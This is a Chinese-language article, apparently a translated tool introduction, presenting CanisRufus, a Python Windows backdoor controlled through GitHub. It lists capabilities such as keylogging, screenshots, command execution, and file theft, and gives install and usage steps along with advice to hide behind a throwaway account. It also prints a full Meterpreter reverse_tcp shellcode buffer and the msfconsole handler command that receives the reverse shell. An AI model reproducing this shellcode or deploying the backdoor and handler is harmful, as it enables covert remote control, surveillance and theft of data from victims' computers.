CanisRufus
今天给大家介绍一款基于Python的Windows隐藏后门,这款后门可以使用GitHub来作为其后台的命令控制服务器。
依赖组件
-Python 2.x
-pygithub3模块
-PyCrypto模块
-WMI模块
-Enum34模块
-Netifaces模块
-pypiwin32模块
功能介绍
l 加密的流量信息(AES)+ SHA256哈希
l 使用系统信息/特征(SHA256哈希)生成唯一的计算机ID
l 任务ID为随机的SHA256哈希
l 收集系统信息
l 收集地理位置信息(例如国家、城市和经纬度等等)
l 获取运行进程、系统服务、系统用户以及硬件设备信息
l 获取客户端列表
l 执行系统命令
l 从客户端下载文件
l 上传文件至客户端
l 执行shellcode
l 屏幕截图
l 锁定客户端屏幕
l 键盘记录
l 锁定远程计算机屏幕
l 关闭或重启远程主机
l 注销当前用户
l 从Web下载文件
l 访问网站
l 向用户显示消息框
l 修改系统时间
安装与配置
首先,你需要一个GitHub账号。注:请使用小号,千万不要使用包含了你个人信息的GitHub账号。
下载与安装
gitclone https://github.com/maldevel/canisrufus.git
pip install -r requirements.txtcanisrufus.py:该脚本可以枚举并向活动客户端发送命令。
client.py:实际部署的后门
用户可以根据自己的需要使用Pyinstaller将client.py编译成可执行程序,建议用户将其编译为32位的Python可执行程序。
使用方式
usage: canisrufus.py [-h] [-v] [-id ID][-jobid JOBID] [-list | -info]
[-cmd CMD | -visitwebsiteURL | -message TEXT TITLE | -tasks | -services | -users | -devices | -downloadPATH | -download-fromurl URL | -upload SRC DST | -exec-shellcode FILE |-screenshot | -lock-screen | -shutdown | -restart | -logoff | -force-checkin |-start-keylogger | -stop-keylogger | -git-checkin CHECK | -jitter jit]
_____ _ ______ __
/ __\ (_) | ___ \ / _|
| / \/ __ _ _ __ _ ___ | |_/ / _| |_ _ _ ___
| | / _` | ‘_ \| / __|| / | || _| | | / __|
| \__/\ (_| | | | | \__ \| |\ \ |_| | | ||_| \__ \
\____/\__,_|_| |_|_|___/\_| \_\__,_|_| \__,_|___/
optional arguments:
-h,–help show this help messageand exit
-v,–version show program’s versionnumber and exit
-idID Client to target
-jobid JOBID Job id toretrieve
-list Listavailable clients
-info Retrieve info on specified client
Commands:
Commands to execute on a client
-cmd CMD Execute asystem command
-visitwebsite URL Visitwebsite
-message TEXT TITLE Show messageto user
-tasks Retrieve runningprocesses
-services Retrievesystem services
-users Retrievesystem users
-devices Retrievedevices(Hardware)
-download PATH Download afile from a clients system
-download-fromurl URL
Download a filefrom the web
-upload SRC DST Upload afile to the clients system
-exec-shellcode FILE Executesupplied shellcode on a client
-screenshot Take ascreenshot
-lock-screen Lock theclients screen
-shutdown Shutdownremote computer
-restart Restartremote computer
-logoff Log off cu
执行Shellcode
$ ./msfvenom -pwindows/meterpreter/reverse_tcp -a x86 –platform Windows EXITFUNC=threadLPORT=4444 LHOST=x.x.x.x -f python
No encoder or badchars specified,outputting raw payload
Payload size: 354 bytes
buf = ”"
buf +=”\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b”
buf +=”\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0\xb7″
buf += “\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf”
buf +=”\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c”
buf +=”\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01″
buf +=”\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31″
buf +=”\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d”
buf +=”\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66″
buf +=”\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0″
buf +=”\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f”
buf +=”\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68″
buf +=”\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8″
buf +=”\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00″
buf +=”\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11″
buf +=”\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea”
buf +=”\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5″
buf +=”\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec”
buf +=”\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02″
buf +=”\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a”
buf += “\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53″
buf +=”\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9″
buf +=”\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40″
buf +=”\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57″
buf += “\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9″
buf +=”\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0″
buf +=”\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c”
buf +=”\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00″
buf += “\x53\xff\xd5″
仅获取shellcode并将其嵌入至文件中
$ cat shell.txt
\xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b\x50\x30\x8b\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf2\x52\x57\x8b\x52\x10\x8b\x4a\x3c\x8b\x4c\x11\x78\xe3\x48\x01\xd1\x51\x8b\x59\x20\x01\xd3\x8b\x49\x18\xe3\x3a\x49\x8b\x34\x8b\x01\xd6\x31\xff\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf6\x03\x7d\xf8\x3b\x7d\x24\x75\xe4\x58\x8b\x58\x24\x01\xd3\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x5f\x5f\x5a\x8b\x12\xeb\x8d\x5d\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x6a\x05\x68\xac\x10\x99\x01\x68\x02\x00\x11\x5c\x89\xe6\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff\xd5\x97\x6a\x10\x56\x57\x68\x99\xa5\x74\x61\xff\xd5\x85\xc0\x74\x0a\xff\x4e\x08\x75\xec\xe8\x61\x00\x00\x00\x6a\x00\x6a\x04\x56\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7e\x36\x8b\x36\x6a\x40\x68\x00\x10\x00\x00\x56\x6a\x00\x68\x58\xa4\x53\xe5\xff\xd5\x93\x53\x6a\x00\x56\x53\x57\x68\x02\xd9\xc8\x5f\xff\xd5\x83\xf8\x00\x7d\x22\x58\x68\x00\x40\x00\x00\x6a\x00\x50\x68\x0b\x2f\x0f\x30\xff\xd5\x57\x68\x75\x6e\x4d\x61\xff\xd5\x5e\x5e\xff\x0c\x24\xe9\x71\xff\xff\xff\x01\xc3\x29\xc6\x75\xc7\xc3\xbb\xe0\x1d\x2a\x0a\x68\xa6\x95\xbd\x9d\xff\xd5\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x53\xff\xd5
控制台运行
./msfconsole -x "useexploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOSTx.x.x.x; run"* 参考来源:canisrufus, FB小编Alpha_h4ck编译